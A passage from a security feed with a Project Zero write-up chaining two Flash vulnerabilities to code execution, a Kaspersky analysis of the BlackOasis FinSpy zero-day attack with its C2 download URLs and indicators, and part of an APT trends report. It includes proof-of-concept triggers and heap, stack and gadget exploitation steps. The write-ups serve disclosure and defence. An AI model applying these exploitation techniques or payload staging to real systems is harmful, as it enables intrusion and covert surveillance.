is then split into subsections for different types and sizes. The goal of partitioning is to allocate objects that are likely to contain memory corruption bugs in a different area of memory than objects that are likely to be useful in exploiting memory corruption bugs, and generally add more entropy to the heap.\n\nThere are currently three partitions on the heap. 
The first partition is generally used for objects that contain pointers: script objects, their backing GC-memory and certain pointer arrays. The second partition is used for objects that contain non-pointer data, mostly arrays of primitive types. The third partition is used for a small number of objects that have a history of being used in exploits. These are typically variable-sized data buffer objects. Outside of the Isolated Heap, checksumming has also been implemented to detect and abort if certain sensitive objects are ever altered.\n\n# CVE-2016-0998\n\n[CVE-2016-0998](<https://code.google.com/p/google-security-research/issues/detail?id=716>) was discovered by Mateusz Jurczyk and I while fuzzing the Flash Player (full code for the exploit can be found [attached](<https://bugs.chromium.org/p/project-zero/issues/detail?id=716#c4>) to this bug). It was reported to Adobe on February 3, 2016 and fixed by Adobe on March 10, 2016. It is a good example of a bug that the Isolated Heap makes more difficult to exploit.\n\nThe bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes.\n\nThis issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is:\n\nvar o = {};\n\no.unwatch();\n\nThe bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. 
In pseudo-code, the rough behaviour of this method is:\n\nvoid* args = alloca( args_size );\n\nfor( int i = 0; i < args_size; i++){\n\n// Init args\n\n}\n\n \n\n\nif ( ((int) args[0]) & 6 == 6 )\n\nargs[0] = call_toString( args[0] );\n\n \n\n\nif ( args_size < 1)\n\nexit();\n\nThere\u2019s a few interesting things to note about this bug. First, on Flash, alloca(0) allocates 16 bytes (the minimum allowed size), but the initialization loop doesn\u2019t run, so this memory contains whatever was on the stack the last time this memory was used, which is not part of the current call. Second, the vulnerable behaviour only occurs if the object on the stack ends in 6. The purpose of this behaviour is to ensure that the parameter is a ScriptObject -- Flash arguments can be many types, such as strings, integers, objects, etc., and the last three bits of the value indicate its type, with 6 indicating a ScriptObject. Finally, this bug bails pretty quickly if the argument array is too small. There\u2019s only one function, call_toString that\u2019s called on the uninitialized value. This function searches through the ScriptObject\u2019s variables for a method called toString, and then calls it, calling some virtual methods in the process.\n\nWith the above constraints, there are a few ways to exploit this bug:\n\n 1. Put an absolute pointer value on the stack. The benefit of this is that you can guarantee that it ends in 6. The downside is that you need a separate bug to bypass ASLR, because there\u2019s no way to get your bearings otherwise\n\n 2. Put a pointer to some type of object or buffer that is not a ScriptObject on the stack, and use type confusion for the exploit. This is somewhat challenging for this particular bug, because valid pointers that end in 6 are unusual on the stack, as most of the time they are aligned. 
The only situation where unaligned pointers are typically on the stack is when manipulating data buffers such as strings where each byte is accessed individually.\n\n 3. Make this bug into a use-after-free. Put a stale pointer to a ScriptObject on the stack and wait for it to be freed and reallocated, and then use type confusion for the exploit\n\nOption 2 seemed the most practical up front, but the Isolated Heap posed some challenges. As noted above, if a call puts an unaligned pointer on the stack, it is probably manipulating some sort of byte data that does not contain pointers, as pointer access needs to be aligned. So it is probably possible to make args[0] point to a buffer type, such as a ByteArray in ActionScript, but ASLR is still a problem, because call_toString calls virtual functions on args[0] , and without knowing the location of any code addresses, the address in the buffer that will be treated as a vtable can\u2019t be set to a reasonable value. One possible way of solving this problem would be to have args[0] point to a buffer, and then realloc it to be something else that has a valid vtable, but all script-controllable byte buffers are allocated in partition 3, which is not used for any other data types that contain pointers, so this isn\u2019t possible with the Isolated Heap.\n\nI then tried Option 3, and tried to reallocate a different object in the place of a ScriptObject. This bug is more amenable to this than a lot of other bugs, because there\u2019s no limitation to when the object needs to be reallocated, other than it needs to be reallocated after the pointer to it is outside of the valid stack (i.e. the stack pointer is higher than the address of the value), and it needs to remain allocated until it is used by the bug. These constraints aren\u2019t very limiting, as basically any object in the Flash Player can be allocated in this window. 
That said, only allocations with the same partition, type and size as a ScriptObject will be allocated in the freed memory. Looking at object allocations in Flash, only about 10 other objects have these properties, and they all extend the same class, the AS3 ScriptObject class (which is different from the AS2 ScriptObject that is freed). Unfortunately though, the first virtual function that this bug calls on the reallocated buffer maps to [ScriptObject::getDescendants](<https://github.com/nxmirrors/tamarin-central/blob/master/core/ScriptObject.cpp>), which immediately throws an ActionScript 3 exception, which leads to a null pointer crash, because exception handlers haven\u2019t been properly initialized. So in this case, there isn\u2019t an appropriate object that can be allocated in the place of an AS3 ScriptObject that can make this bug exploitable as a use-after-free.\n\nAt this point, I didn\u2019t think it was very likely that this bug would be exploitable without a second information leak vulnerability, so I tried exploiting it with a second bug.\n\n# CVE-2016-0984\n\n[CVE-2016-0984](<https://code.google.com/p/google-security-research/issues/detail?id=698>) is a use-after-free in sound processing in which the freed buffer can only be read. I reported CVE-2016-0984 on January 11, 2016 and Adobe released a patch on February 16, 2016.\n\nA proof-of-concept for the bug is as follows:\n\nvar s = new Sound(); \nvar b = new ByteArray(); \nfor( var i = 0; i < 1600; i++){ \nb.writeByte(1); \n} \nb.position = 0; \ns.loadPCMFromByteArray(b, 100, \"float\", false, 2.0); \nvar c = new ByteArray(); \nfor(var i = 0; i < 2; i++){ \nc.writeByte(1); \n} \nc.position = 0; \ntry{ \ns.loadPCMFromByteArray(c, 1, \"float\", false, 2.0); \n}catch(e:Error){ \ntrace(e.message); \n} \n \nvar d = new ByteArray(); \ns.extract(d, 1, 0);\n\nThis bug is related to exception handling in the loadPCMFromByteArray method. 
This method loads sound data from an array that is provided by ActionScript, and then processes it, and stores it internally in the Sound object. The general flow of the function is as follows:\n\nif ( input_size < needed_size ){ // needed_size is wrong\n\nthrowASException();\n\n}\n\n \n\n\ndelete[] m_pcm;\n\nchar* sound_data = new char[input_size];\n\n \n\n\nfor( int i = 0; i < input_size; i++){\n\nsound_data[i] = inputArray.readStuff(); // can throw exception\n\n}\n\n \n\n\nm_pcm = sound_data;\n\nThe code attempts to check that the array is the right size and throws an exception before it does any pointer manipulation, but there is an arithmetic error in how the size is calculated, so some situations in which the array is too small will get through (see the [tracker](<https://code.google.com/p/google-security-research/issues/detail?id=698>) for exact details on how to trigger this condition). In this case, the input array will throw an exception when it is read, which means that m_pcm will be freed but not reallocated. This is a fairly versatile bug, in that the array that is freed can be of any size, though it is always a character array in partition 2, the data heap.\n\nThe first step was to use this bug to obtain the address of a vtable to break ASLR. It wasn\u2019t immediately obvious how to do this, as the heap partition the array is allocated in is generally used for primitive arrays. There were two exceptions to this I was aware of. First, arrays of pointers that aren\u2019t void pointers are allocated on this heap, but this isn\u2019t particularly helpful for this bug, as they tend to be pointers to other primitive data types, and even if they were pointers to objects, there\u2019s no way to use this bug to iterate through pointers, it can only be used to read values off the heap without knowing their location. 
Another property I noticed is that object arrays are also allocated in this partition, so if an array of objects that call virtual methods (or contain function pointers) is allocated, you could read the code pointers off of the heap. When I looked though, I couldn\u2019t find a single array of virtual objects allocated in a way that is script-controllable in Flash, as arrays of pointers are usually used instead.\n\nEventually, I discovered that the ActionScript JIT LIR implements its own [basic heap](<https://github.com/nxmirrors/tamarin-central/blob/master/nanojit/Allocator.h>), and allocates new pages as large char arrays, which are allocated in the same heap partition as other char arrays. These pages have variable sizes, and often contain objects with vtables. By selecting a PCM array allocation size that lines up with a frequent LIR allocation, I was able to read a vtable off the heap.\n\nThe next step was to get a pointer to a buffer I could control in script. It is possible to also use CVE-2016-0998 for this, but I suspected that using this bug could do it more simply and reliably. Since arrays of char pointers are allocated on the same heap partition as sound PCM data, char pointers could be easily read. I used the AS3 function [LocaleID.determinePreferredLocales](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/globalization/LocaleID.html#determinePreferredLocales\\(\\)>) to allocate a char* array based on the String vector that is provided as input. Unfortunately though, ActionScript strings aren\u2019t ideal for exploits. They are immutable after they are allocated, and worse, they terminate as soon as a NULL character is reached, which means on 64-bit systems, they can only ever contain one pointer. 
The best solution to this would be to allocate an array of pointers to something more controllable, such as a byte or int Array, but unfortunately in ActionScript, arrays of these types of pointers are fairly unusual, and when they exist, their size is usually not controllable from script. So instead, I reallocated the string data that the char pointers pointed to, so that they were integer arrays instead. This was possible in part because the strings allocated internal to the LocaleID.determinePreferredLocales method are not true Flash strings that are accessible via script, but character arrays, so they show up in partition 2 of the heap (the data partition) as opposed to partition 3 (the exploitable objects partition).\n\nI used the [BitmapData.paletteMap](<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/display/BitmapData.html#paletteMap\\(\\)>) method to allocate integer arrays in the place of the character arrays allocated by LocaleID.determinePreferredLocales. This method accepts input of four integer arrays of size 256, and copies them to a larger int array of length 1024. These arrays are not mutable, but since the vtable pointer, and the pointer to the buffer have been determined at this point, it doesn\u2019t matter, as all values that need to be in the array can be calculated before the array is created. Another undesirable property of this method is that the arrays are freed at the end, but there is a trick for getting around it. If any element of the arrays provided to the method is not an integer, Flash will attempt to call valueOf on it to convert it to a number. So if a late element (for example, the last element of the fourth array) has a valueOf that throws an exception, execution of the method will stop. In this case, the large int array will be allocated, and most of the input will be copied to it, but the part of the function that processes and frees the arrays will be skipped. 
This is a useful trick to avoid objects being freed that works in a lot of methods.\n\nAt this point, we have a pointer to a vtable, and a pointer to a buffer we control, so it\u2019s fairly straightforward to gain code execution using CVE-2016-0998.\n\n# Putting it all together\n\nFor CVE-2016-0998 to use the allocated buffer, a pointer to it with the final three bits set to 6 needs to be put on the stack. There are a few ways to do this, one of them being UTF conversion. UTF-8 to UTF-16 conversion is done on the stack if the length of the resulting UTF-16 string is less than 256 bytes, which leads to the character values of the string being written to the stack.\n\nTo start off, my exploit grows the stack. This is just to avoid any values that have already been written from causing problems. This isn\u2019t as straightforward as one would expect. The ActionScript stack is not the same as the C++ stack (where this bug occurs), so calling a function recursively in ActionScript won\u2019t grow it. Instead, there needs to be a loop in C++. To cause this, I triggered a situation where toString would be called recursively, which would be done in C++. In ActionScript:\n\n_global.v = 31;\n\n_global.mc = this;\n\nvar o = {toString : f};\n\nthis.swapDepths(o);\n\nfunction f(){\n\nif(_global.v > 0){\n\n_global.v = _global.v - 1;\n\n_global.mc.swapDepths(this);\n\n}else{\n\nvar t = _global.mc;\n\nt.swapDepths(d, 2);\n\n}\n\nreturn \"ffffffffffffffffffffffffffffffffffffffffffffffffffffffff\";\n\n}\n\nThis code calls swapDepths, which calls toString from C++, which then recursively calls swapDepths again, growing the stack. \n\nThe value that is returned from this type of function then gets converted from UTF-8 to UTF-16, so its contents get put on the stack. This can be used to put the pointer to the controllable buffer on the stack. 
Unfortunately, conversion only happens if the String is encoded statically in the SWF; a string generated during AS execution won\u2019t work. So a SWF needs to dynamically be created as a part of the exploit. \n\nThis process can be seen in [test.cgi](<https://bugs.chromium.org/p/project-zero/issues/detail?id=716>). The first part of the exploit, soundPCM.swf uses CVE-2016-0984 to break ASLR and create a buffer, and then it passes the location of the buffer to test.cgi via URL parameters in JavaScript. This calls into Python, and adds the correct address into a static string in a SWF called new.swf. Note that a UTF-8 converter is implemented in Python; this is because standard UTF encoding leads to characters of different lengths, and putting different lengths of strings into the SWF causes \u201cmovement\u201d in memory when it is loaded, which can cause problems with the exploit which relies on static offsets. The implemented converter always creates three-byte UTF-8 encodings even if a shorter one is possible based on the specific buffer pointer value. Also note that the full string in the SWF will not get fully converted, because the 0x0000 value at the beginning of the 64-bit pointer will be treated as a null, and processing will stop. This isn\u2019t ideal; it means that only one pointer can ever be copied to the stack, but it is a constraint that can be worked around.\n\nAt this point, we have a SWF that puts a pointer to the buffer on the stack; we now just need to trigger the exploit. I encoded this into the same SWF for simplicity. Once the SWF has been created, it is loaded once with URL parameter num=15, which sets up the stack, and then with URL parameter num=14, which triggers the bug, causing native toString to be called on the buffer that\u2019s provided.\n\n# What\u2019s in the buffer\n\nThe last step is to figure out what to put in the buffer. 
Running through the native call, there are a few pointers that need to be set to something valid to avoid crashes (I pointed them back to various locations in the same buffer), and then a virtual call is made to the buffer. Setting the memory at the head of the buffer the call sees as the vtable to a location later in the buffer, and creating a fake vtable in that memory, it\u2019s possible to make a call into a gadget. This exploit uses the following one:\n\nmov rdi, rax\n\ncall [rax + 0x28]\n\nThis sets rdi to the head of the vtable, which is set to a string command, and then rax + 0x28 (0x28 bytes into the vtable) is set to a location which calls system in the Flash plug-in, which triggers a call to system.\n\n# Conclusion\n\nThe Isolated Heap made exploiting CVE-2016-0998 more difficult and time consuming, and also made exploitation require a separate information leak bug, which probably would not have been required before the heap changes. There are a couple of weaknesses in the Isolated Heap, especially the use of the data partition for JIT allocation, and allocating pointer arrays on the data heap. We are working with Adobe to implement improvements to the Isolated Heap in future versions of Flash. 
It is challenging to harden a heap against exploitation, especially in the face of high-quality bugs, but the Isolated Heap is a substantial improvement.\n\n", "modified": "2016-03-28T00:00:00", "published": "2016-03-28T00:00:00", "id": "GOOGLEPROJECTZERO:3CC5C12B80F69A02CA55F9CCF64DF766", "href": "https://googleprojectzero.blogspot.com/2016/03/life-after-isolated-heap.html", "type": "googleprojectzero", "title": "\nLife After the Isolated Heap\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2017-10-16T15:16:55", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-11292", "CVE-2017-8759"], "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was the latest version of FinSpy malware. We have reported the bug to Adobe who assigned it [CVE-2017-11292 and released a patch](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) earlier today.\n\nSo far only one attack has been observed in our customer base, leading us to believe the number of attacks is minimal and highly targeted.\n\nAnalysis of the payload allowed us to confidently link this attack to an actor we track as \"BlackOasis\". 
We are also highly confident that BlackOasis was also responsible for another zero day exploit (CVE-2017-8759) discovered by [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) in September 2017. The FinSpy payload used in the current attacks (CVE-2017-11292) shares the same command and control (C2) server as the payload used with CVE-2017-8759 uncovered by FireEye.\n\n## BlackOasis Background\n\nWe first became aware of BlackOasis' activities in May 2016, while investigating another Adobe Flash zero day. On May 10, 2016, Adobe [warned](<https://helpx.adobe.com/security/products/flash-player/apsa16-02.html>) of a vulnerability (CVE-2016-4117) affecting Flash Player 21.0.0.226 and earlier versions for Windows, Macintosh, Linux, and Chrome OS. The vulnerability was actively being exploited in the wild.\n\nKaspersky Lab was able to identify a sample exploiting this vulnerability that was uploaded to a multi scanner system on May 8, 2016. The sample, in the form of an RTF document, exploited CVE-2016-4117 to download and install a program from a remote C&C server. Although the exact payload of the attack was no longer in the C&C, the same server was hosting multiple FinSpy installation packages.\n\nLeveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time. Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively. These exploit chains also delivered FinSpy installation packages.\n\nSince the discovery of BlackOasis' exploitation network, we've been tracking this threat actor with the purpose of better understanding their operations and targeting and have seen a couple dozen new attacks. 
Some lure documents used in these attacks are shown below:\n\nDecoy documents used in BlackOasis attacks\n\nTo summarize, we have seen BlackOasis utilizing at least five zero days since June 2015:\n\n * CVE-2015-5119 - June 2015\n * CVE-2016-0984 - June 2015\n * CVE-2016-4117 - May 2016\n * CVE-2017-8759 - Sept 2017\n * CVE-2017-11292 - Oct 2017\n\n## Attacks Leveraging CVE-2017-11292\n\nThe attack begins with the delivery of an Office document, presumably in this instance via e-mail. Embedded within the document is an ActiveX object which contains the Flash exploit.\n\n**Flash object in the .docx file, stored in uncompressed format**\n\nThe Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits.\n\n**Unpacking routine for SWF exploit**\n\nThe exploit is a memory corruption vulnerability that exists in the \"**com.adobe.tvsdk.mediacore.BufferControlParameters**\" class. 
If the exploit is successful, it will gain arbitrary read / write operations within memory, thus allowing it to execute a second stage shellcode.\n\nThe first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files:\n\nNOP sled composed of 0x90 and 0x91 opcodes\n\nThe main purpose of the initial shellcode is to download second stage shellcode from hxxp://89.45.67[.]107/rss/5uzosoff0u.iaf.\n\n**Second stage shellcode**\n\nThe second stage shellcode will then perform the following actions:\n\n 1. Download the final payload (FinSpy) from hxxp://89.45.67[.]107/rss/mo.exe\n 2. Download a lure document to display to the victim from the same IP\n 3. Execute the payload and display the lure document\n\n### Payload - mo.exe\n\nAs mentioned earlier, the \"mo.exe\" payload (MD5: 4a49135d2ecc07085a8b7c5925a36c0a) is the newest version of Gamma International's FinSpy malware, typically sold to nation states and other law enforcement agencies to use in lawful surveillance operations. 
This newer variant has made it especially difficult for researchers to analyze the malware due to many added anti-analysis techniques, to include a custom packer and virtual machine to execute code.\n\nThe PCODE of the virtual machine is packed with the aplib packer.\n\n**Part of packed VM PCODE**\n\nAfter unpacking, the PCODE will look like the following:\n\n**Unpacked PCODE**\n\nAfter unpacking, the virtual machine PCODE is then decrypted:\n\n**Decrypted VM PCODE**\n\nThe custom virtual machine supports a total of 34 instructions:\n\n**Example of parsed PCODE**\n\nIn this example, the \"1b\" instruction is responsible for executing native code that is specified in the parameter field.\n\nOnce the payload is successfully executed, it will proceed to copy files to the following locations:\n\n * C:\\ProgramData\\ManagerApp\\AdapterTroubleshooter.exe\n * C:\\ProgramData\\ManagerApp\\15b937.cab\n * C:\\ProgramData\\ManagerApp\\install.cab\n * C:\\ProgramData\\ManagerApp\\msvcr90.dll\n * C:\\ProgramData\\ManagerApp\\d3d9.dll\n\nThe \"AdapterTroubleshooter.exe\" file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique. The \"d3d9.dll\" file is malicious and is loaded into memory by the legit binary upon execution. Once loaded, the DLL will then inject FinSpy into the Winlogon process.\n\n**Part of injected code in winlogon process**\n\nThe payload calls out to three C2 servers for further control and exfiltration of data. We have observed two of them used in the past with other FinSpy payloads. 
Most recently one of these C2 servers was used together with CVE-2017-8759 in the attacks reported by FireEye in September 2017. These IPs and other previous samples tie closely to the BlackOasis APT cluster of FinSpy activity.\n\n## Targeting and Victims\n\nBlackOasis' interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region. This includes prominent figures in the United Nations, opposition bloggers and activists, and regional news correspondents. During 2016, we observed a heavy interest in Angola, exemplified by lure documents indicating targets with suspected ties to oil, money laundering, and other illicit activities. There is also an interest in international activists and think tanks.\n\nVictims of BlackOasis have been observed in the following countries: Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola.\n\n## Conclusions\n\nWe estimate that the attack on HackingTeam in mid-2015 left a gap on the market for surveillance tools, which is now being filled by other companies. One of these is Gamma International with their FinFisher suite of tools. Although Gamma International itself was hacked by Phineas Fisher in 2014, the breach was not as serious as it was in the case of HackingTeam. 
Additionally, Gamma had two years to recover from the attack and pick up the pace.\n\nWe believe the number of attacks relying on FinFisher software, supported by zero day exploits such as the ones described here, will continue to grow.\n\nWhat does it mean for everyone and how to defend against such attacks, including zero-day exploits?\n\nFor CVE-2017-11292 and other similar vulnerabilities, one can use [the killbit](<https://answers.microsoft.com/en-us/windows/forum/windows_8-update/flashplayer-updates/cd258a3f-cd87-4ea9-bdb6-074d06ad491e?auth=1>) for Flash within their organizations to disable it in any applications that respect it. Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit. Additionally, this may break any other necessary resources that rely on Flash and of course, it will not protect against exploits for other third party software.\n\nDeploying a multi-layered approach including access policies, anti-virus, network monitoring and whitelisting can help ensure customers are protected against threats such as this. Users of Kaspersky products are protected as well against this threat by one of the following detections:\n\n * PDM:Exploit.Win32.Generic\n * HEUR:Exploit.SWF.Generic\n * HEUR:Exploit.MSOffice.Generic\n\n## Acknowledgements\n\nWe would like to thank the Adobe Product Security Incident Response Team (PSIRT) for working with us to identify and patch this vulnerability.\n\n## References\n\n 1. 
Adobe Bulletin <https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>\n\n## Indicators of compromise\n\n4a49135d2ecc07085a8b7c5925a36c0a \n89.45.67[.]107", "modified": "2017-10-16T14:28:47", "published": "2017-10-16T14:28:47", "id": "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "href": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "title": "BlackOasis APT and new targeted attacks leveraging zero-day exploit", "type": "securelist", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-29T03:16:10", "bulletinFamily": "blog", "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "description": "\n\n## Introduction\n\nSince 2014, Kaspersky Lab's Global Research and Analysis Team (GReAT) has been providing threat intelligence reports to a wide-range of customers worldwide, leading to the delivery of a full and dedicated private reporting service. Prior to the new service offering, GReAT published research online for the general public in an effort to help combat the ever-increasing threat from nation-state and other advanced actors. Since we began offering a threat intelligence service, all deep technical details on advanced campaigns are first pushed to our subscriber base. At the same time, to remain true to our efforts to help make the internet safer, important incidents, such as WannaCry or Petya are covered in both private and public reports.\n\n[](<https://securelist.com/files/2017/08/APT-report-Q2-2017-1.png>)\n\nKaspersky's Private Threat Intelligence Portal (TIP)\n\nIn Q1 of 2017 we published our [first APT Trends report](<https://securelist.com/apt-trends-report-q1-2017/78169/>), highlighting our top research findings over the last few months. 
We will continue to publish quarterly reports as a representative snapshot of what has been offered in greater detail in our private reports in order to highlight significant events and findings we feel most users should be aware of. If you would like to learn more about our intelligence reports or request more information for a specific report, readers are encouraged to contact: **intelreports@kaspersky.com**.\n\n## Russian-Speaking Actors\n\nThe second quarter of 2017 has seen multiple incidents involving Russian-speaking threat actors. Topping the list of 'attention grabbers' were the Sofacy and Turla threat actors.\n\nMarch and April started off with a bang, with the discovery of three zero-day exploits being used in-the-wild by Sofacy and Turla: two of these targeted Microsoft Office's Encapsulated PostScript (EPS) and the third being a Microsoft Windows Local Privilege Escalation (LPE). Sofacy was discovered utilizing both CVE-2017-0262 (an EPS vulnerability) and CVE-2017-0263 (LPE) over the Easter holiday, targeting a swath of users throughout Europe. Prior to this attack, Turla was also discovered using CVE-2017-0261 (a different EPS vulnerability). Neither actor appeared to deviate from their usual payload repertoire, with Sofacy dropping their typical GAMEFISH payload and Turla utilizing what we refer to as ICEDCOFFEE (a.k.a. Shirime). Targeting for these attacks was also directly within the normal wheelhouse for both actors, focusing mainly on foreign ministries, governments, and other government-affiliated organizations.\n\nGReAT produced additional reports on Sofacy and Turla beyond those mentioned above. In April, we notified customers of two new experimental macro techniques utilized by Sofacy. These techniques, while not particularly sophisticated, caught our attention as they had not been seen before in-the-wild. The first technique involved using the built-in 'certutil' utility in Microsoft Windows to extract a hardcoded payload within a macro. 
The second technique involved embedding Base64-encoded payloads within the EXIF metadata of the malicious documents. While the targeting for this new set of activity was again fairly standard, we discovered some noteworthy targeting against a French political party member prior to the 2017 elections. Moving into May and June, we wrote two additional reports of interest involving these two actors: the first was an update on the long running \"Mosquito Turla\" campaign showing the usage of fake Adobe Flash installers and continued targeting of foreign Ministries. The other documented yet another update on Sofacy's unique Delphi payload we call 'Zebrocy'.\n\nJune saw the massive outbreak of a piece of malware [dubbed](<https://securelist.com/schroedingers-petya/78870/>) \"ExPetr\". While initial assessments presumed that this was yet another ransomware attack \u00e0 la WannaCry, a deeper assessment by GReAT places the initial intent as constituting an operation destructive in nature. We were also able to confidently identify the initial distribution of the malware, as well as indicate a _low confidence_ assessment that the attacks may share traits with the BlackEnergy actors.\n\nBelow is a summary of report titles produced for the Eastern European region only. As stated above, if you would like to learn more about our threat intelligence products or request more information on a specific report, please direct inquiries to **intelreports@kaspersky.com**.\n\n 1. Sofacy Dabbling in New Macro Techniques\n 2. Sofacy Using Two Zero Days in Recent Targeted Attacks - early warning\n 3. Turla EPS Zero Day - early warning\n 4. Mosquito Turla Targets Foreign Affairs Globally\n 5. Update on Zebrocy Activity June 2017\n 6. ExPetr motivation and attribution - Early alert\n 7. 
BlackBox ATM attacks using SDC bus injection\n\n## English-Speaking Actors\n\nEnglish-speaking actors are always particularly fascinating due to their history of complex tooling and campaigns. Actors like Regin and Project Sauron have proven fascinating examples of new techniques leveraged in long-lasting, hard to catch campaigns and as such make ideal subjects for further research. Not to be outdone, Equation and the Lamberts were the subjects of our most recent investigations.\n\nContinuing our practice of conducting malware paleontology while integrating new discoveries, we published a report on EQUATIONVECTOR, an Equation backdoor first used as early as 2006. This backdoor is a fascinating passive-active shellcode staging implant. It's one of the earliest noted instances of a NObody But US ('NOBUS') backdoor for staging further attacks. Despite its age, the EQUATIONVECTOR backdoor (identified as 'PeddleCheap' in the latest ShadowBrokers disclosures) incorporates many advanced techniques for prolonged stealthy operations in victim networks, allowing the Equation operators to deliver further payloads without arousing suspicion. The report tracks the development of these tools through subsequent iterations year-by-year.\n\nOur tracking of the Lamberts toolkit continues with the publication of the Gray Lambert report in June, the most advanced Lambert known to date. This too is a NOBUS backdoor, a passive implant operating strictly in user-land. The intricate usefulness of Gray Lambert lies in its ability to orchestrate multiple sniffer victims on a network via broadcast, multicast, and unicast commands, allowing the operators to employ surgical precision in networks with many infected machines. The sniffers double as next-stage payload delivery mechanisms for an infected network. 
A notable feature of the Lambert campaigns is the level of precision with which targets are chosen; Gray Lambert's victimology is primarily focused on strategic verticals in Asia and Middle East. During this investigation, GReAT researchers have also discovered two additional Lambert families (Red Lambert and Brown Lambert) currently under investigation for Q3. Below is a list of report titles for reference:\n\n 1. EQUATIONVECTOR - A Generational Breakdown of the PeddleCheap Multifunctional Backdoor\n 2. The Gray Lambert \u2013 A Leap in Sophistication to User-land NOBUS Passive Implants\n\n## Korean-speaking Actors\n\nOur researchers focusing on attacks with a Korean nexus also had a very busy quarter, producing seven reports on the Lazarus group and WannaCry attacks. Most of the reports on Lazarus directly involved a sub-group we refer to as BlueNoroff. They are the arm that focuses mainly on financial gain, targeting banks, ATMs, and other \"money-makers\". We revealed to customers a previously unknown piece of malware dubbed 'Manuscrypt' used by Lazarus to target not only diplomatic targets in South Korea, but also people using virtual currency and electronic payment sites. Most recently, 'Manuscrypt' has become the primary backdoor used by the BlueNoroff sub-group to target financial institutions.\n\nWannaCry also created quite a stir in the second quarter, with our analysts producing three reports and multiple blog posts on this emerging threat. What proved most interesting to us, was the probable linkage to Lazarus group as the source of the attacks, as well as the origins of the malware. GReAT researchers were able to trace back some of its earliest usage and show that before the 'EternalBlue' exploit was added to version 2, WannaCry v1 was used in spearphishing attacks months prior. Here is a listing of our reports from Q2 on actors with a Korean nexus:\n\n 1. Manuscrypt - malware family distributed by Lazarus\n 2. Lazarus actor targets carders\n 3. 
Lazarus-linked ATM Malware On the Loose In South Korea\n 4. Lazarus targets electronic currency operators\n 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert\n 6. WannaCry possibly tied to the Lazarus APT Group\n 7. The First WannaCry Spearphish and Module Distribution\n\n## Middle Eastern Actors\n\nWhile there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past; CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.\n\nAfter the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.\n\n 1. OilRig exploiting CVE-2017-0199 in new campaign\n 2. BlackOasis using Ole2Link zero day exploit in the wild\n\n## Chinese-Speaking Actors\n\nOn the Chinese speaking front, we felt it necessary to produce two reports to our customers. 
